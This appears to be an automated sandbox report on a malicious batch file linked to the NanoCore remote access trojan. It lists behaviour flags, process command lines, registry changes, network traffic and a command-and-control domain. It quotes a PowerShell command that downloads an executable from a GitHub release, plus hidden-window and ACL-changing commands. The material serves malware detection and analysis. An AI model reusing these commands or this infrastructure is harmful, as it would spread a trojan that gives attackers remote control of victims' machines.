File name:

a.bat

Full analysis: https://app.any.run/tasks/be1db1b3-a706-4f9d-aa76-e403f580fa02
Verdict: Malicious activity
Threats:

NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website.

Analysis date: May 15, 2025, 15:15:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
nanocore
rat
remote
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

527036CAE6EBF86E4ADFC2B46E458052

SHA1:

EA3BF7A0D97916001C131D3BECCA2CD7DAB6BEA2

SHA256:

6F55DD423E865B5DF8A6630124C0CEC575D8F8141458CCA0EFF7DB3F6C1FCC2B

SSDEEP:

48:I7s7BK7E4ep3zI8FicIJpCvedwi2gPH2YQzKApr/X2EP:cVedI8sv+KApjbP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5200)
      • powershell.exe (PID: 496)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 5640)
    • Changes Windows Defender settings

      • cmd.exe (PID: 5640)
    • Changes the autorun value in the registry

      • RuntimeBroker.exe (PID: 7012)
    • Connects to the CnC server

      • RuntimeBroker.exe (PID: 7012)
    • Starts CMD.EXE for self-deleting

      • RuntimeBroker.exe (PID: 7012)
    • NANOCORE has been detected (SURICATA)

      • RuntimeBroker.exe (PID: 7012)
  • SUSPICIOUS

    • The process executes VB scripts

      • cmd.exe (PID: 6036)
      • RuntimeBroker.exe (PID: 7012)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6036)
      • cmd.exe (PID: 5640)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5720)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5720)
      • RuntimeBroker.exe (PID: 7012)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 6036)
      • cmd.exe (PID: 5640)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5720)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 5640)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 5640)
    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 7012)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 920)
      • RuntimeBroker.exe (PID: 7012)
    • The process creates files with name similar to system file names

      • RuntimeBroker.exe (PID: 7012)
    • Potential Corporate Privacy Violation

      • RuntimeBroker.exe (PID: 7012)
    • Connects to unusual port

      • RuntimeBroker.exe (PID: 7012)
    • Contacting a server suspected of hosting an CnC

      • RuntimeBroker.exe (PID: 7012)
    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 1532)
      • schtasks.exe (PID: 3272)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 6048)
    • Reads security settings of Internet Explorer

      • vbc.exe (PID: 5048)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5800)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5800)
    • Disables trace logs

      • powershell.exe (PID: 920)
    • Checks proxy server information

      • powershell.exe (PID: 920)
    • Checks supported languages

      • RuntimeBroker.exe (PID: 7012)
      • vbc.exe (PID: 2340)
      • vbc.exe (PID: 5048)
    • Process checks whether UAC notifications are on

      • RuntimeBroker.exe (PID: 7012)
    • Creates files or folders in the user directory

      • RuntimeBroker.exe (PID: 7012)
    • Creates files in the program directory

      • RuntimeBroker.exe (PID: 7012)
    • Reads the computer name

      • vbc.exe (PID: 2340)
      • vbc.exe (PID: 5048)
    • Create files in a temporary directory

      • vbc.exe (PID: 2340)
      • vbc.exe (PID: 5048)
    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 7012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
26
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs cacls.exe no specs wscript.exe no specs sppextcomobj.exe no specs slui.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe #NANOCORE runtimebroker.exe attrib.exe no specs vbc.exe no specs vbc.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
496powershell -window hidden -command ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
864"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
920Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1300ping -n 1 -w 3000 1.1.1.1 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
1532"schtasks.exe" /delete /f /tn "LAN Host"C:\Windows\SysWOW64\schtasks.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1812taskkill /f /im "RuntimeBroker.exe" C:\Windows\SysWOW64\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
2088C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
2340"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\admin\AppData\Local\Temp\nryhcmhw.11p"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.9149
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\rpcrt4.dll
3272"schtasks.exe" /delete /f /tn "LAN Host Task"C:\Windows\SysWOW64\schtasks.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3888\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
20 340
Read events
20 334
Write events
5
Delete events
1

Modification events

(PID) Process:(6036) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(7012) RuntimeBroker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:LAN Host
Value:
C:\Program Files (x86)\LAN Host\lanhost.exe
(PID) Process:(5048) vbc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5048) vbc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5048) vbc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7012) RuntimeBroker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:delete valueName:LAN Host
Value:
C:\Program Files (x86)\LAN Host\lanhost.exe
Executable files
2
Suspicious files
4
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
5048vbc.exeC:\Users\admin\AppData\Local\Temp\bhv42C3.tmp
MD5:
SHA256:
5200powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5crx01nk.gyn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
496powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vzaqugbn.bma.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6036cmd.exeC:\Users\admin\AppData\Local\Temp\getadmin.vbstext
MD5:D14A6C18536B08C2D91CC10129CEC2CA
SHA256:88F0E55BE41422957E8F4FEC8CAF0F9ED4E68D1F0290171BA8F4BD26C19FA17D
496powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_glvsfqpw.u5j.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w3ylx3pf.a50.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l4xk5245.4ei.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
920powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0b50xr1y.fsw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
920powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fjcr2vxn.hhz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5200powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qza0nbud.hyf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
27

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.158:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3896
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3896
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
23.48.23.158:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.32.76:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
920
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
920
powershell.exe
185.199.111.133:443
objects.githubusercontent.com
FASTLY
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.48.23.158
  • 23.48.23.157
  • 23.48.23.162
  • 23.48.23.149
  • 23.48.23.159
  • 23.48.23.155
  • 23.48.23.143
  • 23.48.23.145
  • 23.48.23.161
whitelisted
www.microsoft.com
  • 23.52.120.96
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 40.126.32.76
  • 20.190.160.2
  • 40.126.32.140
  • 20.190.160.132
  • 20.190.160.64
  • 40.126.32.134
  • 20.190.160.128
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.108.133
  • 185.199.109.133
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
cybrc082-39826.portmap.io
  • 193.161.193.99
malicious

Threats

PID
Process
Class
Message
7012
RuntimeBroker.exe
Potential Corporate Privacy Violation
ET INFO DNS Query to a Reverse Proxy Service Observed
7012
RuntimeBroker.exe
Misc activity
ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io)
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT CnC 7
7012
RuntimeBroker.exe
Malware Command and Control Activity Detected
ET MALWARE NanoCore RAT Keep-Alive Beacon (Inbound)
No debug info